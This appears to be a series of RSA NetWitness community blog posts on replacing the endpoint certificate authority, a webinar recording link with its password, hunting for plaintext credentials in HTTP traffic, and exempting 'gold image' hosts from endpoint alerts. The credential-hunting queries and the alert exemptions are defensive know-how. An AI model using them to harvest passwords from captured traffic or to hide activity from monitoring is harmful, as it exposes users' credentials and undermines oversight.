What’s the magnitude and impact of it?

 

Special thanks to Russel Ridgley, RSA's UKI CTO, who contributed to and helped me write this article. Please feel free to leave a comment if you have any questions or would like to understand more about the RSA NetWitness solution. Thank you!

By default, NetWitness Endpoint 11.x creates a self-signed Certificate Authority during its initial installation, and uses this CA to generate certificates for the endpoint agent and the local reverse proxy that handles all incoming agent communications. Because all these certificates are generated from the same CA chain, they automatically trust each other and enable seamless, easy, and secure communications between agents and the endpoint server.

 

But what if this self-signed CA cannot be used within your organization? For a number of very valid reasons, many orgs might not allow software using a self-signed certificate, and may instead be required to use their own trusted CAs. If this is the case, we have a couple options - an easy way, and a hard way.

 

This blog covers the hard way.

 

Everything that we do in the hard way must occur after the Endpoint Log Hybrid host has been fully installed and provisioned. This means you'll need to complete the entire host installation before moving on to this process.

 

There are 2 primary requirements for the hard way:

  • you must be able to create a server certificate and private key capable of Server Authentication
  • you must be able to create a client certificate and private key capable of Client Authentication
    • this client certificate must have a Common Name (CN) value of rsa-nw-endpoint-agent

 

I won't be going into details on how to generate these certificates and keys - your org should have some kind of process in place for this. And since the certificates and keys generated from that process can output in a number of different formats, I won't be going into details on how to convert or reformat them. There are numerous guides, documents, and instructions online to help with that.

 

Once we have our server and client certificates and keys, make sure to also grab the CA chain used to generate them (at the very least, both certs need to have a common Root or Intermediate CA to be part of the same trusted chain). This should hopefully be available through the same process used to create the certs and keys. If not, we can also export CA chains from websites - if you do this, make sure it is the same chain used to create your certificates and keys.

 

The endstate format that we'll need for everything will be PEM. The single server and/or client cert should look like this:

-----BEGIN CERTIFICATE-----
MIIFODCCAyCgAwIBAgICEAEwDQYJKoZIhvcNAQELBQAwEjEQMA4GA1UEAwwHUm9v
dC1jYTAeFw0yMDA4MDUyMDE0MTdaFw0zMDA4MDMyMDE0MTdaMCUxIzAhBgNVBAMM
....snip....
-----END CERTIFICATE-----

 

The private key should look like this:

-----BEGIN PRIVATE KEY-----
MIIJQwIBADANBgkqhkiG9w0BAQEFAASCCS0wggkpAgEAAoICAQCuUtxhFPb+FtWD
mQyIELpYVW7isU2KA7ur6ZhWDnKI6pD1POYHfyftO6MhxYsaRrwQ+XxhRJhyT/Ht
....snip....
-----END PRIVATE KEY-----

 

And the Certificate Chain should look like this (one BEGIN-END block per CA certificate in the chain...also, it will help to simplify the rest of the process if this chain only includes CA certificates):

-----BEGIN CERTIFICATE-----
MIIFODCCAyCgAwIBAgICEAEwDQYJKoZIhvcNAQELBQAwEjEQMA4GA1UEAwwHUm9v
dC1jYTAeFw0yMDA4MDUyMDE0MTdaFw0zMDA4MDMyMDE0MTdaMCUxIzAhBgNVBAMM
....snip....
-----END CERTIFICATE-----
-----BEGIN CERTIFICATE-----
MIIFBzCCAu+gAwIBAgIJAK5iXOLV5WZQMA0GCSqGSIb3DQEBCwUAMBIxEDAOBgNV
BAMMB1Jvb3QtY2EwHhcNMjAwODA1MTk1MTMxWhcNMzAwODAzMTk1MTMxWjASMRAw
....snip....
-----END CERTIFICATE-----

 

We want to make sure we have each of these PEM files for both the server and client certs and keys we generated. Once we have these, we can proceed to the next set of steps.

 

The rest of this process will assume that all of these certificates, keys, and chains are staged on the Endpoint Log Hybrid host.

Every command we run from this point forward occurs on the Endpoint Log Hybrid.

We end up replacing a number of different files on this host, so you should also consider backing up all the affected files before running the following commands.

 

For the server certificates:

  • # cp /path/to/server/certificate.pem /etc/pki/nw/web/endpoint-web-server-cert.pem
  • # cp /path/to/server/key.pem /etc/pki/nw/web/endpoint-web-server-key.pem
  • # cat /path/to/server/certificate.pem > /etc/pki/nw/web/endpoint-web-server-cert.chain
  • # cat /path/to/ca/chain.pem >> /etc/pki/nw/web/endpoint-web-server-cert.chain
  • # openssl crl2pkcs7 -nocrl -certfile /path/to/server/certificate.pem -certfile /path/to/ca/chain.pem -out /etc/pki/nw/web/endpoint-web-server-cert.p7b
  • # cp /path/to/ca/chain.pem /etc/pki/nw/nwe-trust/truststore.pem
  • # cp /path/to/ca/chain.pem /etc/pki/nw/nwe-ca/customrootca-cert.pem
  • # echo "/etc/pki/nw/nwe-ca/customrootca-cert.pem" > /etc/pki/nw/nwe-trust/truststore.p12.idx
  • # echo "/etc/pki/nw/nwe-ca/customrootca-cert.pem" > /etc/pki/nw/nwe-trust/truststore.pem.idx

 

The end results, with all the files we modified and replaced (as written by the commands above), should be:

/etc/pki/nw/web/endpoint-web-server-cert.pem
/etc/pki/nw/web/endpoint-web-server-key.pem
/etc/pki/nw/web/endpoint-web-server-cert.chain
/etc/pki/nw/web/endpoint-web-server-cert.p7b
/etc/pki/nw/nwe-trust/truststore.pem
/etc/pki/nw/nwe-trust/truststore.p12.idx
/etc/pki/nw/nwe-trust/truststore.pem.idx
/etc/pki/nw/nwe-ca/customrootca-cert.pem

 

Once we're confident we've completed these steps, run:

  • # systemctl restart nginx

 

We can verify that everything so far has worked by browsing to https://<endpoint_server_IP_or_FQDN> and checking the certificate presented by the server:

 

If this matches our server certificate and chain, then we can move on to the client certificates. If not, then we need to go back and figure out which step we did wrong.

 

For the client certificates:

  • openssl pkcs12 -export -out client.p12 -in /path/to/client/certificate.pem -inkey /path/to/client/key.pem -certfile /path/to/ca/chain.pem

 

...enter a password for the certificate bundle, and then SCP this client.p12 bundle onto a Windows host. We'll come back to it in just a moment.

 

In the NetWitness UI, browse to Admin/Services --> Endpoint-Server --> Config --> Agent Packager tab. Change or validate any of the configurations you need, and then click "Generate Agent Packager." The Certificate Password field here is required to download the packager, but we won't be using the OOTB client certificate at all so don't stress about the password.

 

Unzip this packager onto the same Windows host that has the client.p12 bundle we generated previously. Next, browse to the AgentPackager\config directory, replace the OOTB client.p12 file with our custom-made client.p12 bundle, move back up one directory, and run AgentPackager.exe.

 

If our client.p12 bundle has been created correctly, then in the window that opens, we will be prompted for a password. This is the password we used when we ran the openssl pkcs12 command above, not the password we used in the UI to generate the packager. If they happen to be the same, fantastic....

 

We'll want to verify that the Client certificate and Root CA certificate thumbprints here match with our custom generated certificates.

 

With our newly generated agent installers, it is now time to test them. Pick a host in your org, run the appropriate agent installer, and then verify that you see the agent showing up in your UI at Investigate/Hosts.

 

If it does appear, congratulations! Make sure to record all these changes, and be ready to repeat them when certificates expire and agent installers need upgrading/updating.

 

If it doesn't, a couple things to check:

  • first, give it a couple minutes...it's not going to show up instantly
  • go back through all these steps and double-check that everything is correct
  • check the c:\windows\temp directory for a log file with the same name as your endpoint agent; e.g.: NWEAgent.log....if there are communication errors between the agent/host and the endpoint server, this log will likely have relevant troubleshooting details
  • if the agent log file has entries showing both "AgentCert" and "KnownServerCert" values, check that these thumbprints match the Client and Root CA certificate thumbprints from the AgentPackager output

    • ...I was not able to consistently reproduce this issue, but it is related to how the certs and keys are bundled together in the client.p12
    • ...when this happened to me, I imported my custom p12 bundle into the Windows MMC Certificates snap-in, and then exported it (make sure that the private key gets both imported and exported, as well as all the CAs in the chain), then re-ran my AgentPackger with this exported client.p12, and it fixed the error
    • ... ¯\_(ツ)_/¯
  • from a cmd prompt on the host, run c:\windows\system32\<service name of the agent>.exe /testnet
  • check the NGINX access log on the Endpoint Log Hybrid; along with the agent log file on the endpoint, this can show whether the agent and/or server are communicating properly
    # tail -f /var/log/nginx/access.log

By default, NetWitness Endpoint 11.x creates a self-signed Certificate Authority during its initial installation, and uses this CA to generate certificates for the endpoint agent and the local reverse proxy that handles all incoming agent communications. Because all these certificates are generated from the same CA chain, they automatically trust each other and enable seamless, easy, and secure communications between agents and the endpoint server.

 

But what if this self-signed CA cannot be used within your organization? For a number of very valid reasons, many orgs might not allow software using a self-signed certificate, and may instead be required to use their own trusted CAs. If this is the case, we have a couple options - an easy way, and a hard way.

 

This blog covers the easy way.

 

The only real requirement for the easy way is that we are able to create an Intermediate CA certificate and its private key from our CA chain (or use an existing pair), and that this Intermediate CA is allowed to generate an additional, subordinate CA under it.

 

For my testing, "Root-ca" was my imaginary company's Root CA, and I created "My Company Intermediate CA" for use in my 11.4 Endpoint Log Hybrid.

 

(I'm no expert in certificates, but I can say that all the Intermediate CAs I created that had explicit extendedKeyUsage extensions failed. The only Intermediate CAs I could get to work included "All" of the Intended Purposes. If you know more about CAs and the specific extendedKeyUsage extensions needed for a CA to be able to create subordinate CAs, I'd be interested to know what they are.)

 

Once we have an Intermediate CA certificate and its private key, we need to make sure they are in PEM format. There are a number of ways to convert and check keys and certificates, and a whole bunch of resources online to help with this, so I won't cover any of the various conversion commands or methods here.

 

If the CA certificate looks like this, then it is most likely in the correct format:

-----BEGIN CERTIFICATE-----
MIIFODCCAyCgAwIBAgICEAEwDQYJKoZIhvcNAQELBQAwEjEQMA4GA1UEAwwHUm9v
dC1jYTAeFw0yMDA4MDUyMDE0MTdaFw0zMDA4MDMyMDE0MTdaMCUxIzAhBgNVBAMM
....snip....
-----END CERTIFICATE-----

 

And if the private key looks like this, then it is most likely in the correct format:

-----BEGIN PRIVATE KEY-----
MIIJQwIBADANBgkqhkiG9w0BAQEFAASCCS0wggkpAgEAAoICAQCuUtxhFPb+FtWD
mQyIELpYVW7isU2KA7ur6ZhWDnKI6pD1POYHfyftO6MhxYsaRrwQ+XxhRJhyT/Ht
....snip....
-----END PRIVATE KEY-----

 

Our last step in this process has to occur at a very specific point during the endpoint log hybrid's installation - after we have run the nwsetup-tui command and the host has been enabled within the NetWitness UI, but before we install the Endpoint Log Hybrid services:

  • on the endpoint host, create directory /etc/pki/nw/nwe-ca
  • place the CA certificate and CA private key files in this directory and name them nwerootca-cert.pem and nwerootca-key.pem, respectively
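A minimal sketch of those two steps (the source paths are assumptions; the destination directory and file names come from the steps above):

  • # mkdir -p /etc/pki/nw/nwe-ca
  • # cp /path/to/intermediate-ca-cert.pem /etc/pki/nw/nwe-ca/nwerootca-cert.pem
  • # cp /path/to/intermediate-ca-key.pem /etc/pki/nw/nwe-ca/nwerootca-key.pem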

 

The basis for this process comes directly from the "Configure Multiple Endpoint Log Hybrid Hosts" step in the Post Installation Tasks guide (https://community.rsa.com/docs/DOC-101660#NetWitne), if you want a bit more context or detail on when this step should occur and how to do it properly.

 

Once we've done this, we can now install the Endpoint Log Hybrid services on the host.

 

I suggest you watch the installation log file on the endpoint server, because if the Intermediate CA does not have all the necessary capabilities, the installation will fail, and this log file can help identify the failing step (if my own experience is any guide, it will most likely fail during the attempt to create the subordinate Endpoint Intermediate CA --> /etc/pki/nw/nwe-ca/esca-cert.pem):

# tail -f /var/log/netwitness/config-management/chef-solo.log

 

If all goes well, we'll be able to check that our endpoint-server is using our Intermediate CA by browsing to https://<endpoint_server_IP_or_FQDN> and checking the certificate presented by the server:

 

And our client.p12 certificate bundle within the agentPackager will be generated from the same chain:

 

And that's it!

 

Any agent packages we generate from this point forward will use the client.p12 certificates generated from our CA. Likewise, all agent-server communications will be encrypted with the certificates generated from our CA.

Thank you for joining us for the July 22nd NetWitness Webinar covering Data Carving using Logs as presented by Leonard Chvilicek. An edited recording is available below, with the Zoom link to the original webinar recording.

 

 

https://Dell.zoom.us/rec/share/9ddSC-v1qVxITbeS5hreSJY6AZnFeaa8hyEe-fYKxEvYejAP3hl67DCXZUjQGil6

Password: V0.*h5#v

This article applies to hunting with NetWitness for Networks (packet-based). Before proceeding, it is important that you are aware of GDPR or any other applicable data collection regulations, which will not be covered here.

 

Hunting for plaintext credentials is an important and easy method of finding policy violations or other enablers of compromise. Increasing numbers of the workforce in remote or work-from-home situations means that employees will be transferring data over infrastructure not controlled by your organization. This may include home WiFi, mobile hotspots, or coffee shop free WiFi.

 

Frequently, this hunting method will reveal misconfigured web servers, poor authentication handling, or applications using baked-in URLs and credentials. While NetWitness does a good job parsing this by default, there are additional steps that can be taken to increase detection and parsing.

 

Key Takeaways

  • Ensure the Form_Data_lua parser is enabled and updated
  • Also hunt for sessions where passwords are not parsed

 

Setup

Most environments will have either the HTTP or HTTP_lua parser currently enabled considering that it is one of the core network parsers. You can check this under your Decoder > Config tab in the Parsers Configuration pane. More details about system parsers and Lua equivalents can be found here: https://community.rsa.com/docs/DOC-79198

 

Form_Data_lua

This parser looks at the body of HTTP content whereas the HTTP/HTTP_lua parsers primarily extract credentials from the headers. Before enabling Form_Data_lua, it is important to understand that this can come with increased resource usage due to the amount of additional data being searched.  You can find statistic monitoring instructions here, although this itself can come with a performance impact as well: https://community.rsa.com/docs/DOC-80210

 

For the purpose of this hunting method, you can disable the “query” meta key if there are resource concerns. In either case, be sure to monitor keys for index overflow. You can adjust the per-key valueMax if needed per the Core Database Tuning Guide: https://community.rsa.com/docs/DOC-81117
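For instance (a sketch only; the right limit depends on your environment, and the definition should mirror your existing custom index entries), raising valueMax for an overflowing key in index-concentrator-custom.xml might look like:

<key description="Query" name="query" format="Text" level="IndexValues" valueMax="250000"/>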

 

Also, if you are not subscribed to and deploying the Form_Data_lua parser, be sure to deploy the latest copy from Live. Along with optimizations, recent changes expand the variables that the parser is searching for, as well as introduce parsing of JSON-based authentication.

 

Hunting

Once the parsers are enabled, you can go to Investigate > Navigate and begin a new query. For ease of record keeping, I like to structure my hunt in these categories:

  • Inbound
    • Password exists
    • Password does not exist
  • Lateral
    • Password exists
    • Password does not exist
  • Outbound
    • Password exists
    • Password does not exist

 

The assumption here is that you’re using the Traffic_Flow_lua parser with updated network definitions to easily identify directionality. If not, you can use other keys such as ip.src and ip.dst. More info on the Traffic_Flow_lua parser here: https://community.rsa.com/docs/DOC-44948

 

Querying where passwords exist is straightforward:

password exists && direction = "inbound" && service = 80
password exists && direction = "lateral" && service = 80
password exists && direction = "outbound" && service = 80

 

Querying where passwords do not exist requires a bit of creativity and assumptions. In many cases, authentication over HTTP will involve URLs similar to http[:]//host[.]com/admin/formLogin. This path is recorded in the directory and filename meta keys, where “/admin/” would be the directory and “formlogin” would be the filename.

 

I’ll often start with the below query (the exclamation point is used to negate “exists”):

password !exists && direction = "outbound" && service = 80 && filename contains "login","logon","auth"

 

You can follow this pattern for other directions, filenames, and directory names as you see fit. The comma-separated strings in the filename query act as a logical OR. It would be equivalent to the following. Pay attention to the parentheses:

password !exists && direction = "outbound" && service = 80 && (filename contains "login" || filename contains "logon" || filename contains "auth")

 

Many authentication sessions will occur using the "POST" HTTP method. If you'd like, you can also append action = "post" to the above query.
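Putting it together, the resulting query would look like this:

password !exists && direction = "outbound" && service = 80 && filename contains "login","logon","auth" && action = "post"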

 

Analysis

After your query completes, you'll be left with a dataset to review. (Hopefully) not all of the sessions will contain credentials, but this is where the human analysis begins. Choose a place to start, then open the Event Analysis view (known simply as the Event view in newer versions). My example here is heavily censored for the purpose of this blog post.

Choose the “Decode Selected Text” option to make viewing this easier.

Now that you’ve found sessions of interest, you can begin appropriate follow-up action. Examples may include advising the website developer to enable HTTPS or discussing app configuration with your mobile appliance team.

 

Conclusion

This hunting method will aid in analyzing security posture from outbound, inbound, and lateral angles. It also serves as an easy gateway for analysts to quickly make a positive security impact as well as become familiar with the intricacies of HTTP communication.

 

NetWitness parsers must balance performance considerations against detection fidelity. While they currently have good coverage, it's beneficial to know how to search data that is malformed or formatted in a way that is impractical for NetWitness to parse.

 

For more hunting ideas, see the NetWitness Hunting Guide: https://community.rsa.com/docs/DOC-62341

 

If you have any comments, feel free to leave them below. If you’re finding recurring patterns in your environment that are not parsed, you can let us know and we’ll assess the feasibility of adding the detection to the parser.

A question has come up a few times on how someone could exclude certain machines from triggering NetWitness Endpoint Agent alerts easily.

 

This particular use case involved their "Gold Images", which are used for deploying machines.  As part of a bigger vision for other server roles & rules, a custom meta key called server.role was created to hold the various roles they have defined for servers in their environment.

 

A Custom Feed was created to associate "Gold Image" as a meta value for that meta key by matching against alias.host, device.host or host.src. This example is just an adhoc feed, but a recurring feed from a CMDB or other tools could be leveraged to keep this list dynamic.

note: my example includes roles other than gold image, just to contrast the values.

 

Now that the meta values are created, we can use these as whitelisting statements for the App rules.

From Admin > Services, select the Endpoint Log Decoder, click View > Config, then select the App Rules tab.

 

Filter by nwendpoint to find the endpoint rules.

Edit the rule you'd like and add server.role != 'gold image' && in front of the rule, as shown in the example below:
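As a hedged illustration (the base rule condition here is invented, not an actual OOTB endpoint rule), an edit would follow this pattern:

Before: device.type = 'nwendpoint' && filename = 'psexec.exe'
After:  server.role != 'gold image' && device.type = 'nwendpoint' && filename = 'psexec.exe'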

Click OK, then Apply the rules.


Repeat for any other rules you would need whitelisted.

 

This is just a simple example, but you can use this approach for many other scenarios.
